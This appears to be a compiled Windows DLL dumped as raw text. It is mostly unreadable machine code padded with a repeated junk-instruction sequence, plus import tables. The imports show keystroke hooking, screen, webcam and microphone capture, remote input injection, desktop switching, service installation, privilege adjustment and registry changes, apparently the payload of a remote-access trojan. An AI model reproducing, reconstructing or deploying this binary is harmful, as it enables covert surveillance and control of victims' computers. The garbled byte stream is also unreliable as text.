�M��Aj  �0j �U�R��A��u�E��@j  �M�Q��A�
�U�R��A_^[��]��U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX����h? �j j �X@�E�}� u�E��@\  �   �M��Q�U�h� �E���P�M�Q�@@�E��}� u�U�R�d@�E��@[  �m�M���  Qj j j j j j j��U��BPj��M�Q�(@��u �U�R�d@�E�P�d@�M��A[  ��U�R�d@�E�P�d@�M��A    _^[��]���������U���8SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EЋH�M������h? �j j �X@�E��}� u�U��B[  ��   h� �E�P�M�Q�@@�E��}� u�U�R�d@�E��@[  �   �E�    �E�    �   3��}��M�   �ŰẺEȃ}� t�m��}� t�&j j �M�Q�@�E���U�Rj�E�P�`@�E��}� t�M��A    �
�U��B[  �E�P�d@�M�Q�d@_^[��]��U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�H�M�����h? �j j �X@�E��}� u�U��B]  �ch� �E�P�M�Q�@@�E��}� u�U�R�d@�E��@]  �1�M�Q�\@�E��U�R�d@�E�P�d@�}� u
�M��A]  _^[��]�����������U�츀  �I  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�����h? �j j �X@�E�}� u�������@Z  ��  �E�    ǅ����    �E�    h��  �{H  ���������������M��U�R������P�M�Qh��  �U�Rjj0�E�P�$@��u4�M�������������R�$H  ���E�P�d@�������AZ  �Q  �������
  �������������u*�U�������������P��G  ���������Ai  �  ǅ����    �  3��������U��U��E�    �	�E���E�M�;�������   �  3��������U�k�$�E��Q������R��A�E�k�$�M��TR������P��A�M�k�$�U��D
������������Q�U�R�������j   ǅ����    j ������PhH  ������Q������R��A�J���������P��A�M�������������R��F  ���E�P�d@_^[��]����U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXh� �E��P�MQ�@@�E��}� u�(  �E�    h    �AF  ���E�U�U�   3��}��E��E�M�Qh    �U�R�E�P� @����   �M�U�B�A�M�U���M�U�B�A�M�U�B�A�M�QR�EH  P��A�M�QR�EH  P��A�M�QR�EH  P��A�M�QR�EH  P��A�M��Qh4f�U�R��B���EH  Ph e�M�Qh  ��������U��U�E�P�1E  ���M�Q�d@_^[��]� �U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M���  �E��}��u�E��@i  �I�E�    j �M�Q�U�BP�M�QR�E�P��A��u�M�Q��A�U��Bi  �
�E�P��A_^[��]����������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M��E�    �U�Rh?  j �E�P�M�  R�8@�E��}� t�E��@h  �[�M�   R�E� 
  P�M�  Rj �E�   P�M�Q�0@�E��}� t�U�R� @�E��@g  �
�M�Q� @_^[��]�U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M��E�    �U�Rh?  j �E�P�M�  R�8@�E��}� t�E��@h  �=�M��   Q�U�R�@�E��}� t�E�P� @�M��Ad  �
�U�R� @_^[��]���������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M��E�    �U�Rh?  j �E�P�M�  R�8@�E��}� t�E��@h  �8h�f�M�Q�tB�E��}� t�U�R� @�E��@d  �
�M�Q� @_^[��]����U��D  �B  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H������ǅ����    ������Rj	j ������P��������  R�8@������������t	������ t�������@X  ��  �E�    �������R  ������������ u�������Ai  ������R� @�  ǅ����    ǅ����    �  3��������ǅ����    �  3��������   ����  �  3��������ǅ����    ǅ�����  ǅ�����  ������Q������R������Pj ������Q������R�E�P������Q�@������������ tK�}� u@ǅ����   ǅ��������ǅ��������j ������Rh  ������P������Q��A��   �}� ��   ������R��A��u:ǅ��������j ������Ph  ������Q������R��A�E����E������ǅ����   ǅ��������ǅ��������j ������Qh  ������R������P��Aj ������Qh  ������R������P��A�M����M��q����E�    �   ����   �  3��������ǅ�����  ǅ�����  ������Pj j j ������Q������R�E�P������Q�@������������ t�:ǅ����   j ������Rh  ������P������Q��A�U����U��Y���������P��A_^[��]��������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��x t�M��Q�U��E�P�%>  ���M��A    �U���R�E���P�M���Q�M����>k��_^[��]��������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�$  P��Aj h�   jj j h   @�M���$  Q��A�E��E�_^[��]���������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��@    �E�   �E�    j h�   jj jh   ��M��$  Q��A�E�}��tnj �U�R�4A�M�A�U�z t:�E�HQ��<  ���E�U�U��E�    j �E�P�M�QR�E�P�M�Q�dA�U�R��A�E�$  P��A�M�QR�E�HQ�U�R�M���Hg���E��}� t�E��E�M�Q�J<  ���E�_^[��]����U��j�hN1d�    Pd�%    ��SVW�M��M����   ��K���E�    �M����  �K���E��E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��A     �U�ǂ�       �E�ǀ�       �M��A    �U��B    �E��@    �M�ǁ�      �U�ǂ�      j j jj �TA�M����  j j jj �TA�U����  h   �-;  ���E�E��M�HP�E�    �	�U����U��}�   }gj ��:  ���E�E��HP�U��E���   3��U��RP�u��<��E��HP�U����@   h   �:  ���E�M��QP�E����U�뇋E��@T    �E������E��M�d�    _^[��]��������V���   �D$t	V�U:  ����^� ��U��j�h~1d�    Pd�%    ��SVW�M��E�� �C�E�   P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��yP tj�E�    �	�U����U��}�   }:�E��HP�U�����M�U�R�9  ���E��HP�U����E�M�Q�9  ��봋U��BP�E�M�Q�{9  ���U����    t�E����   �U����   �Q�R�E����    t�M����   R�PA�M����   �@_���M����  �2_���E����  Q��A�U����  P��A�E� �M����  �PI���E������M����   �;I���M�d�    _^[��]�����������U���(  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj j j �M����  �Na����u�M����  R��A�M  ƅ���� �   3��������f��������Ph   @�M����  �Y��������Q��AP������R�M����  �Q����u*�M���  �E��H Q��B�U����  P��A��  ��A�M����  �U�f�Bh �E�f�@Z �M�f�AX �U�f�Bf �E�f�@Z �M��A\"V  �U��B`D�  �E�3�f�HZ�U�3�f�Bf�������ȋE�f�Hdǅ����    h   �M�Qh��U���XRj�������P�0C��t�M����  R��A�  ǅ����    ���������������������   }rj �M��QP��������Q������R�C��t�E����  Q��A�   j �U��BP��������R������P� C��t�M����  R��A�y�s���������P�$C��t�M����  R��A�Qj j j ������P��B��t�������  u��ً�����Q�(C������R�,C�E����  Q��A_^[��]��U���,  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f���B������������QhXf������R��B��j j j j j j h   �������P��4  �M��A �U��z  u�E����  Q��A�  ǅ����   j ������R�E���P�M����   ��]����u"�M��Q R��B�E����  Q��A�M  ��A�U����  �M��;  ��u"�E��H Q��B�U����  P��A�  �M��M  ��u*�M��A  �M��Q R��B�E����  Q��A��   ƅ���� �   3��������f��������Rh   @�M����   �U��������P��AP������Q�M����   �M����u'�M��  �U��B P��B�M����  R��A�Yj j j ������P��B��t�������  u�������Q��B�̋U��B P��B�M��U  �M����  R��A_^[��]���������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPhF  �M���   �/W����t�MQhS  �M���  �W����u3��i�U�Rj hP� �8B���E�Pj h@� �8B���E�    3ɉM��U��  �E��M��  �U�j�j�E�Pj�DAjd� B�   _^[��]� ����������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H Q�C��tj j h
  �U��B P�C�E���E�    �}� u3��   �M���  ��u7�M��Q R�C��tj j h  �E��H Q�C�E���E�    3��z�U��B P�C��t �M���lQj,h  �U��B P�C�E���E�    �}� u7�M��Q R�C��tj j h  �E��H Q�C�E���E�    3���   _^[��]���U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H Q�C��t�U�Rj h	  �E��H Q�C�E���E�    �}� u3��v�U��B P�C��th  j h  �M��Q R�C�E���E�    �}� u3��6�E��H Q�C��tj j h?  �U��B P�C�E���E�    �E�_^[��]�����������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H Q�C��tj j hE  �U��B P�C�E���E�    h�   � B�M��Q R�C��tj j hD  �E��H Q�C�E���E�    h�   � B�U��B P�C��tj j h  �M��Q R�C�E���E�    h�   � B�E��H Q�C��tj j h  �U��B P�C�E���E�    _^[��]���U���xSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �   3��}��E��H Q�C��t�U�Rj`hA  �E��H Q�C�E���E�    �}� u3��A  �E�    �E�    �E�   �E�    �E�2   �U��B P�C��t�M�Qj`h@  �U��B P�C�E���E�    �}� u3���  �M��Q R�C��t �E���$Pj,h,  �M��Q R�C�E���E�    �}� u3��  �E��@k������������M��A�E��U�f�B2 �E��M��Q�P(�E��M��Q�P,�E��M��H8�U��B P�C��t �M���$Qj,h-  �U��B P�C�E���E�    �}� u3��  �M�Qj �8A�U����   �E��   Pj �M����   R��C�E��M����  �U����  P���  Q�U����   �M����   �
P�Q�U����   P�<A�M��A�U�ǂ�   A   �E��   Ph0c�������M�ǁ      �U���  ��C���C�J��C�B��C�J�U�ǂ     �E�ǀ     �M����   �U���  �   _^[��]����������U���(SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EP�C��tj j h  �MQ�C�E���E�    �U܉U��}� ��  �E��x ��  �M��U�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�P�M���$Q��  ���E��U����   �E�M���   Q�U��    R�E�P�M��QR�(  �E�}� t�E��M�H�U�U���E�E�M��M��U��U�}� tj�E��M���E���E�    �E�ǀ�      ǀ�      �M�ǁ�      ǁ�      �U����  Rj�E����  Q���  R�E����   �U����   �Q�Rj�E��  P�M����   ��C����t#�M����  R�E��HQ�M����   ��C����u%�U��B    j j h�  �E����  Q��B�c�U�ǂ�      ǂ�      �E�ǀ�      ǀ�      �M����  Qj �U����  P���  Q�U����   �M����   �
P�Q�   _^[��]� U��QSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��}� t"�M��y u�}�  u�UR�EP�M��   _^[��]� ����U��j�h�1d�    Pd�%    ��dSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj �EP�MQ�C��t�  �U��z ue�E��@   j�M���XQ�M����  �.B����tj �UR�M����  �B����u(�E��@   j j h�  �M����  R��B�  �E�H��	��  R�(  ���E��E��E��M�Q����  P��'  ���E��M��M��U�B�� ��  3��}������ʃ��E�H��	��  3��}������ʃ��E�H�U�2�}������ȃ���E��E��E��E��E�    �M�Q�U��E�P�M�Q�U�R�M����j�E�P�M����  �A����t�M�Q�U�R�M����  ��@����uP�E��@   �M��M��U�R�'  ���E��E��M�Q��&  ��j j h�  �U����  P��B�E������X�M��M��U�R��&  ���E��E��M�Q�&  ��j �UR�EP�C��t	�E������j �MQ�UR� C�E������M�d�    _^[��]� ���������������QVj�#  ��3�;�t*�L$�T$�D$�D$PQR��C��#  �F�D$�F��^YÐ�U��QSVW�M��E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��A    �   3��}����f��E�_^[��]�����������V���   �D$t	V�%  ����^� ��U��QSVW�M��E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX_^[��]���������U���   SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    �@   3��� ����ǅ����    3�������ǅ������ ǅ����    ǅ����    h   �$  ���������������������   ����   ǅ����    ǅ����    ���������������������;�����s��������� ���;Eu��͋�����;�����u(������@s�������E��� �����������������3҅�u�������Pj j ������Q�U��R�TC���Hj h�  ������P�MQ�lC������������ �j ������R������P�MQ�LC����������������������P�#  ���MQ�hC�UR�hC_^[��]����������U��QSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M��R�E��HQ��������U��z t�E��HQ�hC�U��B    �E��8 t�M��R�hC�E��     _^[��]�������������U��QSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M��QR�E��Q�3������U��z t�E��HQ�hC�U��B    �E��8 t�M��R�hC�E��     _^[��]�������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E������ǅ����    �   3��������   ������������󥋍������D�����D���R�!  ��ǅt���    ƅ���� �@   3��������f��f�E�  h��  �c!  ����@�����@���������j j������Q������R�lC��x�����x���t-��������<�����<���Q�	!  ��������R�hC��
  ����������W  �������B���D  ǅt���   j h�   ��������Q������R�lC��x�����x��� -��������8�����8���Q�   ��������R�hC�=
  �������H��ux�������B��uj�������Q��u\�������H��tN����������`�����`���P��A��\�����\�����`����D
��`�����`���Q������R��A�@ƅX��� 3�f��Y�����[����������Q��X�����X���P�xCP������Q��A������f�BP�XCf�E���  �����������  ǅt���   j �������HQ������R������P�lC��x����������Q9�x���t-��������4�����4���Q�  ��������R�hC��  ������P��A��u������Q��A���2  ��������������@j j������Q������R�LCj j������P������Q�lC��x�����x���u���������t-��������0�����0���R�k  ��������P�hC�(  ƅP��� j j��P���Q������R�lC��x�����x���t-��������,�����,���Q�  ��������R�hC��  j ��P���P������Q������R�lC��x�����P���9�x���t-��������(�����(���R�  ��������P�hC�m  ��P����������
 ������P������Q��@��tX��������������@j j������Q������R�LC������P�hC��������$�����$���R�"  ����  ƅP��� j j��P���P������Q�lC��x�����x���t-�������� ����� ���P��  ��������Q�hC�  j ��P���R������P������Q�lC��x�����P���9�x���t-����������������Q�t  ��������R�hC�1  ��P���������� ������R������P��@��tX��������������Bj j������P������Q�LC������R�hC����������������Q��  ���  ��������������@ j j������Q������R�LC�+������� �������A j j������R������P�LCj j������Q������R�lC��x�����x���t-����������������Q�G  ��������R�hC�  ��������T�����T���3ҊQ���*  ��T���3ɊH����   j j������R������P�lC��x�����x���t-����������������R�  ��������P�hC�|  ƅL��� 3�f��M�����O������������L�����L���Q�xC�����������3����+����������ȃ�󤋍����f�QR�XCf�E��P  ��T���3ɊH���  ƅH��� j j��H���R������P�lC��x�����x���t-����������������R��  ��������P�hC�  j ��H�����Q������R������P�lC��x�����H�����9�x���t-����������������P�z  ��������Q�hC�7  ��H��������������������ʃ����H���Ƅ���� ��H���������f�
P�XCf�E��-����������������R��  ��������P�hC�  �-�������� ����� ���R��  ��������P�hC�  �-������������������R�  ��������P�hC�^  fǅd���  3ɉ�f�����j�����n���f��r���ǅ|���   �U�����  R������P�.U���������������� t��|���Q��d���R������P��C��t���u}������������� u�������B�
�������@ �������A �������B��������h����Hf��f���R�HC������f�Aj j
������R������P�LC�z��t���uq3ɋ������
�������  ������ u�������A[�
�������BZf��f���P�HC������f�A��������h����Bj j������Q������R�LC������������������Q�  �������� u������R�hC������P�hC�   ǅ����    3ɉ�����������Rj hP	�8B��������������Pj h��8B��������j�j ������Qj�DA������ t������R�hCǅ����    ������ t������P�hCǅ����    h�  � B_^[��]��������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M�f�QR��M�����M��A�U��z u�   �E�    �   ����   j j �M��QR�\C�E��}��u�fjh�  ���E��E��E�M�U���E��@    �M���
Q�U��R��A�E���JP�M��HQ��A�U�Rj h�	�8B���q���_^[��]���U��QSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�}����   �u�f��E��HQ�hC�U�Rj h��8B��_^[��]� ������������U��QSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��HQ�hC_^[��]�����U��j�h�1d�    Pd�%    QSVW�M��M���(��#���E�    �M���<  ��#���E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��A    �U��B    �E��@    �M��A    �U��B    �E��@    �M��A    �U��B     �E��@$    �E������E��M�d�    _^[��]������V���   �D$t	V�E  ����^� ��U��j�h�1d�    Pd�%    QSVW�M��E�� �C�E�   P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M���<  ��8���M���(��8���E� �M���<  �#���E������M���(�#���M�d�    _^[��]������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�    �E� �E�    �E� � �E�;E���   j �M�Qj�U�R�E�HQ�dA��t�}� u3��   �UU��E��M��>ur�U����U��}�ra�EE��H���>uR�UU��B���RuC�MM��Q���Iu4�EE��H���Du%�UU��B���<u�M��U����U���P}�F�����E����E��6����E�_^[��]� U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    h  � �  ���E�E�E��   ��t;�U�R�M��d����E��}� u�$jj j �E�P�M�Q�M��<  �=7����u�뼋U��U��E�P�  ��_^[��]�������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�    h��  �N  ���E��E��E��   ��tBj�U�R�E�Pj j �M��(�6����u�#�}� tj �M�Q�U�R�E�P�M�QR��A뵋E��E�M�Q��  ���U�z u�E��@    �M�QR��A�E�x u�M��A    �U�BP��A�M�y u�U��B    �E�HQ��A�U�z u�E��@    �M�QR��A_^[��]���������������U��QSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M�����_^[��]�������U��QSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M�����_^[��]�������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPhG  �M��<  �2����t�MQhS  �M��(�2����u�  hU  hz��������u��   �M���   ����   �E�    3҉U��E�Pj h��8B���E��M�Qj h�8B���E�j�j �U�Rj�DA�E�x u�M��A    �U�BP��A�M�y u�U��B    �E�HQ��A�U�z u�E��@    �M�QR��A�E�x u�M��A    �U�BP��Aj �M�Q$R��Ah�  � B_^[��]� ������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�   �E�   �E�    j��A�M�A j �U�R�E��P�M��Q�A��u3��&  �U�BPj�� A��u3��  jj j �M��Q�hAP�U�BP�hAP��@�E��}� u3���   �M�QR��Aj��A�M�Aj �U�R�E��P�M��Q�A��t�U�BPj�� A��u3��   jj j �M��Q�hAP�U�BP�hAP��@�E��}� u3��L�M�QR��A�M��?   ��u3��/�E�HQj�� A��t�U�B Pj�� A��u3���   _^[��]��U���XSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�   3��}���E�D   �E�    �E�    f�E�  �E�  �E��H�M�U��B�E��M��Q�U�f�E�  �E�P�M�Qj j h   jj j hzj ��A��u3���U��E��B$�   _^[��]��������   �   ��������f�v ��������h�!�  YÐ�����f���������U��SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�ph   �E�lh�M�th�U��h�|h    hhh�`hP�@�   _^[]����U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��M��M��m��}� t�m��}� t�m�|�}� t6�Yj j j�������[��R��Aj j h�  �0�P��B�7��Q��Aj j h�  �0�R��B�j j �lhP������_^[��]� ���������U��SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX��f�R��_^[]��������������U��SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EP������_^[]� ���������U���8SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�  �u� p�h   jh\f��B�E�}� t
�E�P� Ch   jjh�c��B�E��}� t
�M�Q��B�E� 3҉U��U�j�E�Phx�������M�Q��A��t�}� t�U�Rh{��A�E��8���A�4���A�0�j j jj �TA���=p th�  � Bhv��A�=p v��v��j j h#�8B��j ��Q�B��t`j j j �U�R��B��tL�EԉE̋M̉Mȁmȶ  �}� t�m��}� t�%��R��A���P��A��f�
��덹Hg�,���=p v�u��h�  � B��Q��A�U�R�C�E�P�C_^[��]� ������������U��SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�hh  �lh   �ph   �th    �xh    �|h    ��h    h p蜅����h0"hxr�@�`h�=`h t&j j j�@�����h p�3���j j j�(�����_^[]� ��������������U���4  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�}�  �E��hfǅP���  �c   3���R����f���P���Qh  �dCƅP��� �?   3���Q����f��ƅ���� �?   3��������f���E� �   3��}��f����P���Rh�f�AP�{��������s  ������Phtf�AP�X��������P  �M�Qhdf�AP�8��������0  ��P���R�|B��L���j jh�  ��L���P��Bǅ����    �\   3��������M�Q�|BP������R��@������H�����H��� t������P�4�Q��H���R�`C��tj j h�  ��L���P��B�p������������ǅ����    ���������������������t  s'�����������3ɊQj h�  ��L���R��B�j jh�  ��L���P��B��H��� t��H���Q�hCj �A�   _^[��]� ��%LBQRh�f�    h�G�   ZY���%�fQRh�f������%�fQRh�f������%�fQRh�f�����%�fQRh�f�����%�fQRh�f�����%�fQRh�f�����%�fQRh�f�t����%�fQRh�f�b����%�fQRh�f�P����%�fU���$�MSV�uW3ۋF�}��E�3��E�$   �u��M�]쫋F�]�]��]��8��+F���ȋF����M������M� t@@�%��  �E��h;�t�M�QS�Ћ؅��Q  ����   ��h��t�M�Qj�Ћ���uP�u���A����uA��@�E���h��t�M�Qj�Ћ���u!�E܉E�EPjj h~ m��$A�E���   W�v��A;�t&�~ t'jj@�A��t�p��h���h�W�A��h�}��t
�M�Qj�Ћ؅���   �V��t2�N��t+�G<ǁ8PE  u9Hu;x4uR�v�   �F�M��P�u�W�A�؅�u;��@�E���h��t
�M�Qj�Ћ؅�u�E܉E�EPjSh m��$A�]��E���h��t�e� �M�Qj�}�]��Ћ�_^[�� VW�|$3ɋ�9t	��A�8 u��t$�_^� ��%�@�%�@�%�@�%�@�%p@�%l@�%DB�%@B�%<B����Q=   �L$r��   -   �=   s�+ȋą���@P��WVS3��D$�}G�T$���ڃ� �D$�T$�D$�}G�T$���ڃ� �D$�T$�u�L$�D$3���؋D$����A�؋L$�T$�D$���������u�����d$�ȋD$���r;T$wr;D$vN3ҋ�Ou���؃� [^_� �=�h�u�t$� BY�h�hh�h�t$�^  ����t$��������Y��HËD$��u9�h~.��h�(B���	��hu?h�   �B��Y��hu3��f�  ��hh`h `��h��   ��hYY�=��u9��h��t0��hV�q�;�r���t�ѡ�h����P�0B�%�h Y^jX� U��S�]V�uW�}��u	�=�h �&��t��u"��h��t	WVS�Ѕ�tWVS������u3��NWVS�m������Eu��u7WPS�������t��u&WVS�������u!E�} t��h��tWVS�ЉE�E_^[]� �%B�%$B�%�@�%�@�%�@�̋M��������ø�C�`������������̋M�������øD�@������������̍����������ø@D� ������������̍�������d��øhD� ������������̍���������ø�D��������������̍������u���ø�D��������������̍�������G��ø�D�������������̍������%?��øE�������������̍������e%��ø0E�`������������̍M��H%��øXE�C���������������̍������%%��ø�E� ������������̍M��%��ø�E����������������̍������E��ø�E��������������̍������%��ø�E��������������̋M������ø F�������������̋M��� ����øHF�������������̋M��� ����ËM���4  ���øpF�Q�������������̋M������ø�F�0������������̍������u��ø�F�������������̋M���U��ø�F��������������̋M����   �2��ËM����  �#��øG�����������̋M����   ���ËM����  ��
��øHG�����������̍M��x#��øxG�s���������������̋M���(�
��ø�G�P������������̋M���(�
��ËM���<  �
��ø�G�!���           
R @Q RQ �R �R �R �R �R �R �R tR bR PR <R ,R R bQ �Q �Q �Q �Q �Q �Q �Q rQ *Q     �T �T     �P �P �P �P �P Q Q �P �P     BT VT rT �T     �Y �Y �Y Z Z ,Z DZ ZZ tZ �Z �Z �Z �Z �Z �Z �Z �Z [  [ 2[ B[ P[ `[ n[ �[ �[ �[ �Y �[ vY hY ZY LY >Y 0Y $Y 
Y �X �X �X �X �X �X �X �X zX fX RX >X *X X �W �W �W �W �W �W �W xW nW bW RW BW 6W "W W �Y �Y �Y �[ �[ �Y  W �V �V �V �V �V �V �V �V nV \V TV HV 2V "V     �U �U �U �U V V �U �U �U �U �U ~U nU      T     *S PS :S     �S �S �S �S T �S �S     |N �N TN hN �N �N �N �N �N �N O O 4O HO ZO vO �O �O �O N �O �O �O �O �O  P @N 2N &N �N pP VP FP 0P $P P     LU (U U U �T �T >U       �  �  �  �	  �  �  �  �  �  ��S s  �  �  �  �4  �  ��S   �    pS     �" P< �n 0w  � �� � �� �� `� �� �� �� `�    gdiplus.dll ��[J�-E��]�Q��     �   D                    �����. �   8D                    �����. �   `D                    �����. �   �D                    ���� / �   �D                    ���� / �   �D                    ����@/ �    E                    ����`/ �   (E                    �����/ �   PE                    �����/ �   xE                    �����/ �   �E                    �����/ �   �E                    ���� 0 �   �E                    ���� 0 �   F                    ����@0 �   @F                    ����`0 �   hF                    �����0 �   �F                    �����0    �0 �   �F                    �����0 �   �F                    �����0 �   G                    ����1 �   8G                    ����01    ?1 �   hG                    ����`1    o1 �   �G                    �����1 �   �G                    �����1 �   �G                    �����1    �1    �C�h�f8H<I                                        dHvH�H�H�H�H�H�HII      GdiplusStartup H  GdipSaveImageToStream   GdipCreateBitmapFromHBITMAP   GdipAlloc   GdipCloneImage e  GdipFree �  GdipDisposeImage e  GdipGetImageEncoders i  GdipGetImageEncodersSize b  GdipCreateBitmapFromGdiDib                                              M         �P �B �J          Q x@ �J         S  @ �L         dS TB N         �S �C �M         �S 8C �L         T dB �L         8T LB  K         �T �@ �J         �T l@ �M         dU C �L         �U B 4K         �[ �@                     
R @Q RQ �R �R �R �R �R �R �R tR bR PR <R ,R R bQ �Q �Q �Q �Q �Q �Q �Q rQ *Q     �T �T     �P �P �P �P �P Q Q �P �P     BT VT rT �T     �Y �Y �Y Z Z ,Z DZ ZZ tZ �Z �Z �Z �Z �Z �Z �Z �Z [  [ 2[ B[ P[ `[ n[ �[ �[ �[ �Y �[ vY hY ZY LY >Y 0Y $Y 
Y �X �X �X �X �X �X �X �X zX fX RX >X *X X �W �W �W �W �W �W �W xW nW bW RW BW 6W "W W �Y �Y �Y �[ �[ �Y  W �V �V �V �V �V �V �V �V nV \V TV HV 2V "V     �U �U �U �U V V �U �U �U �U �U ~U nU      T     *S PS :S     �S �S �S �S T �S �S     |N �N TN hN �N �N �N �N �N �N O O 4O HO ZO vO �O �O �O N �O �O �O �O �O  P @N 2N &N �N pP VP FP 0P $P P     LU (U U U �T �T >U       �  �  �  �	  �  �  �  �  �  ��S s  �  �  �  �4  �  ��S   �    pS     PostThreadMessageA  �wsprintfA �MessageBoxA xSetThreadDesktop  �OpenInputDesktop  aGetThreadDesktop  � ExitWindowsEx  CallNextHookEx  �UnhookWindowsHookEx :GetMessageA ySetTimer  �SetWindowsHookExA 9SendInput NSetCursorPos  PostMessageA  �OpenDesktopA  GetForegroundWindow �SetWindowsHookExW wGetWindowTextA  {GetWindowThreadProcessId  �wsprintfW � GetActiveWindow & CharLowerA  4 CharUpperA  � EnumWindows �UpdateWindow   BringWindowToTop  �ShowWindow  � DestroyWindow � DispatchMessageA  :SendMessageA  �IsWindow  E CloseWindowStation  C CloseDesktop  gSetProcessWindowStation �OpenWindowStationA  USER32.dll  � DeleteObject  , CreateCompatibleBitmap  jGetDIBits � DeleteDC   BitBlt  SelectObject  - CreateCompatibleDC  . CreateDCA kGetDeviceCaps GDI32.dll > CloseServiceHandle  d CreateServiceA  >StartServiceA �OpenServiceA  B ControlService  � DeleteService �OpenSCManagerA   AdjustTokenPrivileges �OpenThreadToken 0ImpersonateSelf MLookupPrivilegeValueA $GetUserNameW  �RegCloseKey �RegQueryValueExA  �RegOpenKeyExA �OpenProcessToken  �RegSetValueExA  �RegCreateKeyExA 6 ChangeServiceConfigA  � EnumServicesStatusA �QueryServiceConfigA �RegDeleteValueA �RegEnumKeyExA �RegEnumValueA 9SetServiceStatus  RegisterServiceCtrlHandlerA ADVAPI32.dll  ShellExecuteA � SHEmptyRecycleBinA  � SHFileOperationA  SHELL32.dll � CreateStreamOnHGlobal ole32.dll A WSASocketA   WSADuplicateSocketA WS2_32.dll  	StrToIntA � StrChrA StrStrA � StrCmpW � StrRChrA  � StrCmpNIA � SHDeleteKeyA  SHLWAPI.dll  GetModuleFileNameExA  PSAPI.DLL e ImmReleaseContext 3 ImmGetCompositionStringW  2 ImmGetCompositionStringA  5 ImmGetContext IMM32.dll  capGetDriverDescriptionA   capCreateCaptureWindowA AVICAP32.dll  � waveInClose � waveInStop  � waveInStart � waveInAddBuffer � waveInPrepareHeader � waveInOpen  � waveInUnprepareHeader WINMM.dll  ??3@YAXPAX@Z   ??2@YAPAXI@Z  I __CxxFrameHandler � _beginthread  �strchr  ^free  �wcscmp  �malloc  �strrchr MSVCRT.dll  U __dllonexit �_onexit _initterm � _adjust_fdiv  �GetTickCount  �WaitForSingleObject �lstrcatA  ISleep ` CreateProcessA  �GetStartupInfoA >GetCurrentThreadId  �lstrcpyA  | DeleteFileA SetEvent  �GetSystemDirectoryA . CloseHandle M CreateFileA � DeviceIoControl �lstrlenA  ;GetCurrentProcessId =GetCurrentThread  �WriteFile �GetTempPathA  kGetLocalTime  �GetOEMCP  � GetACP  